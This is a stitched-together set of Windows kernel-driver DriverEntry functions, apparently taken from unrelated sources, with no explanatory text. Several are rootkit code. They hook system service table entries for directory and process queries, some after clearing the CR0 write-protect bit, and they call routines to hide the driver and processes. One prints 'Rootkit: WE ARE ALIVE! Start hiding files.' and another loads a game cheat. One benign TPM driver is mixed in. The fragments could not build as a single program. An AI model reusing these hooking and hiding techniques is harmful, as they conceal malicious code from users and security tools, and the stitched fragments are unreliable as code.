NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
{
int i;
DbgPrint("My Driver Loaded!");
GetProcessNameOffset();
// Register a dispatch function
for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
{
theDriverObject->MajorFunction[i] = OnStubDispatch;
}
theDriverObject->DriverUnload = OnUnload;
// save old system call locations
OldZwQueryDirectoryFile=(ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile));
OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));
// hook system calls
_asm cli
(ZWQUERYDIRECTORYFILE) (SYSTEMSERVICE(ZwQueryDirectoryFile))= NewZwQueryDirectoryFile;
(ZWQUERYSYSTEMINFORMATION) (SYSTEMSERVICE(ZwQuerySystemInformation))= NewZwQuerySystemInformation;
_asm sti
return STATUS_SUCCESS;
}
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
{
DbgPrint("BHWin is al1v3!");
// make sure we can write to the memory pages that hold the service table
if(!NT_SUCCESS(ChangeServiceTableMemoryFlags()) )
{
DbgPrint("Error, ChangeServiceTableMemoryFlags()");
return STATUS_UNSUCCESSFUL;
}
GetProcessNameOffset();
theDriverObject->DriverUnload = OnUnload;
// place the hook using InterlockedExchange (no need to disable interrupts)
// this uses the LOCK instruction to lock the memory bus during the next instruction
// Example:
// LOCK INC DWORD PTR [EDX+04]
// This staves off collisions on multi-processor machines, while cli/sti only disable interrupts
// on the current processor.
//
OldZwQuerySystemInformation =
(ZWQUERYSYSTEMINFORMATION) InterlockedExchange( (PLONG) &g_MappedSystemCallTable[ SYSCALL_INDEX(ZwQuerySystemInformation) ],
(LONG) NewZwQuerySystemInformation);
return STATUS_SUCCESS;
}
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject,PUNICODE_STRING RegistryPath)
{
NTSTATUS status = STATUS_SUCCESS;
WDF_DRIVER_CONFIG config;
PAGED_CODE();
KdPrintEx((DPFLTR_PNPMEM_ID, DPFLTR_INFO_LEVEL,
"TPM Driver - using Windows Driver Frame"));
ProcessNameOffset = GetProcessNameOffset();
//
// Initialize the Driver Config structure.
//
WDF_DRIVER_CONFIG_INIT( &config, TpmEvtDeviceAdd );
//
// Register a cleanup callback so that we can call WPP_CLEANUP when
// the framework driver object is deleted during driver unload.
//
status = WdfDriverCreate( DriverObject,
RegistryPath,
NULL,
&config,
WDF_NO_HANDLE);
if (!NT_SUCCESS(status)) {
KdPrintEx((DPFLTR_PNPMEM_ID, DPFLTR_INFO_LEVEL,
"WdfDriverCreate failed with status %!STATUS!", status));
}
return status;
}
NTSTATUS DriverEntry( PDRIVER_OBJECT pDriverObject,
PUNICODE_STRING pRegistryPath )
{
PDEVICE_OBJECT pdo = NULL;
NTSTATUS s = STATUS_SUCCESS;
UNICODE_STRING usDriverName, usDosDeviceName;
RtlInitUnicodeString( &usDriverName, DRIVER_NAME );
RtlInitUnicodeString( &usDosDeviceName, DEVICE_NAME );
s = IoCreateDevice( pDriverObject, 0, &usDriverName, \
FILE_DRIVER_SSDT, FILE_DEVICE_SECURE_OPEN, \
FALSE, &pdo );
if( STATUS_SUCCESS == s )
{
pDriverObject->MajorFunction[IRP_MJ_CREATE] = SSDTCreate;
pDriverObject->MajorFunction[IRP_MJ_CLOSE]=SSDTClose;
pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] \
= SSDTDeviceIoCtl;
pDriverObject->DriverUnload = SSDTUnload;
IoCreateSymbolicLink( &usDosDeviceName, &usDriverName );
}
MUTEX_INIT(LogMutex);
// GetProcessNameOffset();
Log = ExAllocatePool(NonPagedPool,sizeof(LOG_BUF));
if(Log == NULL)
{
s = STATUS_INSUFFICIENT_RESOURCES;
}
else
{
Log->Length = 0;
Log->Next = NULL;
//pCurrentLog = Log;
NumLog = 1;
}
pSystem = PsGetCurrentProcess();
DbgPrint("pSystem %0x",pSystem);
pebAddress = GetPebAddress();
pObjectTypeProcess = *(PULONG)((ULONG)pSystem - OBJECT_HEADER_SIZE +OBJECT_TYPE_OFFSET);
MyPspTerminateThreadByPointer =GetUndocumentFunctionAdress();
GetProcessNameOffset();
DbgPrint( "SSDT: Load Success!" );
return s;
}
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
{
DbgPrint("Rootkit: WE ARE ALIVE! Start hiding files.\n");
GetProcessNameOffset();
theDriverObject->DriverUnload = OnUnload;
// UNProtect memory
__asm
{
push eax
mov eax, CR0
and eax, 0FFFEFFFFh
mov CR0, eax
pop eax
}
// place the hook using InterlockedExchange (no need to disable interrupts)
// this uses the LOCK instruction to lock the memory bus during the next instruction
// Example:
// LOCK INC DWORD PTR [EDX+04]
// This staves off collisions on multi-processor machines, while cli/sti only disable interrupts
// on the current processor.
//
OldZwQueryDirectoryFile =
(ZWQUERYDIRECTORYFILE) InterlockedExchange( (PLONG) &SYSTEMSERVICE(ZwQueryDirectoryFile),
(LONG) NewZwQueryDirectoryFile);
DbgPrint("%x",(PLONG) &SYSTEMSERVICE(ZwQueryDirectoryFile));
OldZwQuerySystemInformation =
(ZWQUERYSYSTEMINFORMATION) InterlockedExchange( (PLONG) &SYSTEMSERVICE(ZwQuerySystemInformation),
(LONG) NewZwQuerySystemInformation);
//add hide reg&files
// REProtect memory
__asm
{
push eax
mov eax, CR0
or eax, NOT 0FFFEFFFFh
mov CR0, eax
pop eax
}
return STATUS_SUCCESS;
}
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
DriverObject->DriverUnload=DriverUnload;
g_hCode=MmLockPagableCodeSection(&IsProcessHidden);
g_hData=MmLockPagableDataSection(&g_hCode);
if (!(ProcessNameOffset = GetProcessNameOffset())) {
UnlockSections();
return STATUS_UNSUCCESSFUL;
}
HideDriver(DriverObject);
if (!NT_SUCCESS(ProcessHide(IsProcessHidden))) {
UnlockSections();
return STATUS_UNSUCCESSFUL;
}
return STATUS_SUCCESS;
}
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryString )
{
NTSTATUS ntStatus = STATUS_SUCCESS;
UNICODE_STRING uDeviceName, uDosDeviceName;
unsigned int iCount = 0;
PVOID pStackAttach = NULL;
HANDLE hThreadHandle = NULL;
OBJECT_ATTRIBUTES ObjectAttributes;
SCOPE(__FUNCTION__);
RtlInitUnicodeString( &uDeviceName, DeviceName );
RtlInitUnicodeString( &uDosDeviceName, DosDeviceName );
// We are assigned to the device of null.sys and create a new symbolic link
//ntStatus = IoCreateSymbolicLink( &uDosDeviceName, &uDeviceName );
//if( !NT_SUCCESS(ntStatus) )
//{
// KdPrint(("Fail on IoCreateSymbolicLink. ntStatus: 0x%08x", ntStatus));
// return ntStatus;
//}
KdPrint(("Loading driver. pDriverObject 0x%08x\n pRegistryString %wZ\n Build at "__TIME__" "__DATE__"\n",
pDriverObject, pRegistryString));
/* Only for testing purposes */
IoCreateDevice( pDriverObject, 0,
&uDeviceName, FILE_DEVICE_UNKNOWN, 0, TRUE, &g_Device );
IoCreateSymbolicLink( &uDosDeviceName, &uDeviceName );
// Set new major functions
for( iCount = 0; iCount < IRP_MJ_MAXIMUM_FUNCTION; iCount++ )
pDriverObject->MajorFunction[iCount] = OnDispatch;
pDriverObject->DriverUnload = DriverUnload;
// Retrieve process offset in EPROCESS
if( !GetProcessNameOffset() )
{
KdPrint(("Error getting process name offset!\n"));
ntStatus = STATUS_UNSUCCESSFUL;
return ntStatus;
}
// Retrieve kernel base pointer
pStackAttach = (PVOID)&KeStackAttachProcess;
g_pKrnlBase = KernelGetModuleBaseByPtr( pStackAttach, "KeStackAttachProcess" );
if( !g_pKrnlBase )
{
KdPrint(("Error getting ntoskrnl base!\n"));
ntStatus = STATUS_UNSUCCESSFUL;
return ntStatus;
}
KdPrint(("Kernel base: 0x%08x\n", g_pKrnlBase));
// Retrieve kernel name (differs from system to system)
if( !GetModuleNameByBase( g_pKrnlBase, szKernelName, NULL ) )
{
KdPrint(("Error getting kernel name by base\n"));
ntStatus = STATUS_UNSUCCESSFUL;
return ntStatus;
}
KdPrint(("NT OS Kernel Name: %s\n", szKernelName));
/* We ignore errors here. Cheat just won't work if something fails */
InitializeObjectAttributes( &ObjectAttributes, NULL, OBJ_KERNEL_HANDLE, NULL, NULL );
PsCreateSystemThread( &hThreadHandle, GENERIC_ALL, &ObjectAttributes, NULL, NULL,
InitializeThread, NULL );
ZwClose( hThreadHandle );
DESCOPE();
return ntStatus;
}
NTSTATUS
DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
NTSTATUS Status = STATUS_SUCCESS;
UNICODE_STRING ntDeviceName;
UNICODE_STRING dosDeviceName;
PDEVICE_EXTENSION deviceExtension;
PDEVICE_OBJECT deviceObject = NULL;
kprintf(" DriverEntry: %wZ\n", RegistryPath);
GetProcessNameOffset();
RtlInitUnicodeString(&ntDeviceName, TEST_KIDISPAT_DEVICE_NAME_W);
//initialize
InitializeListHead(&g_HookInfoListHead);
g_Ksmp= (KSEMAPHORE*)kmalloc(sizeof(KSEMAPHORE));
// save old system call locations
KeInitializeSemaphore(g_Ksmp, SemaphoreCount, SemaphoreCount);
Status = IoCreateDevice(
DriverObject,
sizeof(DEVICE_EXTENSION), // DeviceExtensionSize
&ntDeviceName, // DeviceName
FILE_DEVICE_TEST_KIDISPAT, // DeviceType
0, // DeviceCharacteristics
TRUE, // Exclusive
&deviceObject // [OUT]
);
if(!NT_SUCCESS(Status))
{
kprintf(" IoCreateDevice Error Code = 0x%X\n", Status);
return Status;
}
deviceExtension = (PDEVICE_EXTENSION)deviceObject->DeviceExtension;
//
// Set up synchronization objects, state info,, etc.
//
//
// Create a symbolic link that Win32 apps can specify to gain access
// to this driver/device
//
RtlInitUnicodeString(&dosDeviceName, TEST_KIDISPAT_DOS_DEVICE_NAME_W);
Status = IoCreateSymbolicLink(&dosDeviceName, &ntDeviceName);
if(!NT_SUCCESS(Status))
{
kprintf(" IoCreateSymbolicLink Error Code = 0x%X\n", Status);
//
// Delete Object
//
IoDeleteDevice(deviceObject);
return Status;
}
//
// Create dispatch points for device control, create, close.
//
DriverObject->MajorFunction[IRP_MJ_CREATE] = Test_kidispatDispatchCreate;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = Test_kidispatDispatchClose;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = Test_kidispatDispatchDeviceControl;
DriverObject->DriverUnload = Test_kidispatUnload;
return Status;
}